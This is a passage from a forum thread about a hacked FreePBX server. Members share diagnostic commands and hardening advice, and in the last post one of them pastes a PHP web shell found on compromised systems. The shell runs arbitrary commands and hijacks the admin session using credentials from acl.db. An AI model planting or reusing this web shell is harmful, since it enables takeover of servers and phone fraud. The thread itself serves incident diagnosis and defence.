FreePBX Server Hacked. Was firewalled but port 80 open to the world


(Lorne Gaetz) #52

Check if any extensions are set to forward:

[root@test]# asterisk -x "database show CF"
/CF/2005                                          : 90210
1 results found.

(Chris) #53

None found.

[root@office-VoIP-Sept-2019 pnetadmin]# asterisk -x "database show CF" 0 results found.


(HawkEye) #54

If you are using port 80 to manage your FreePBX, all data is sent in CLEAR TEXT. Everything you send including admin user and password are in clear text. You should ONLY be using port 443 to login and use the FreePBX GUI.

On top of that, you should ONLY allow the administrator(s) IP address(es) to access 80/443. Since I don’t know your setup, here is some food for thought.

At my office and at our data centre we have Mikrotik routers. From our office, we have L2TP/IPSec VPN. In the remote FreePBX servers, iptables only allows connections from RFC1918 addresses (192.168.xxx.xxx, 172.16.xxx.xxx, etc.) to port 80 and connections to port 80 are then redirected to port 443. Also use htpasswd to protect and do NOT use the same user/pass credentials for htpasswd as you have for the FreePBX gui. When outside the office, VPN to office router and then able to securely access FreePBX GUI.

Failed sip logins are banned and the ban is sent to the Mikrotik router permanently. The bans can be deleted of course by the person controlling the Mikrotik router.

Since our office doesn’t have static IP address, simply use IP/Cloud in Mikrotik to get an a cname address and that address is added to both Mikrotik and to our custom iptables firewall scripts.

In outbound routes, we only have those international countries we actually call.


(Mvogel4949) #55

I’ve had a few compromised systems in the past. In each instance I found files in /var/www/html that didn’t belong. Usually there was one called phpversions.phpThey would have something like the following: Might we be looking at a php vulnerability?

<form action="" method="post" ><input size=20 type=password name="p" /><input size=60 type=text name="c" /><input type=submit value="Hacked" /></form>
Hacked >
<?php
if(md5($_REQUEST['p'])=='5e93f3072191e5add6c4bd9c1a89c807') 
{
@system($_REQUEST['c']); 
include_once "/var/www/html/libs/paloSantoDB.class.php"; 
include_once "/var/www/html/libs/paloSantoACL.class.php"; 
$pDB = new paloDB("sqlite3:////var/www/db/acl.db"); 
$db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'"); 
session_name("elastixSession"); 
session_start(); 
$_SESSION['elastix_user'] = $db[0][0]; 
$_SESSION['elastix_pass'] = $db[0][1]; 
echo '<a href="/" >Emad__Was__Here</a>';
}
?>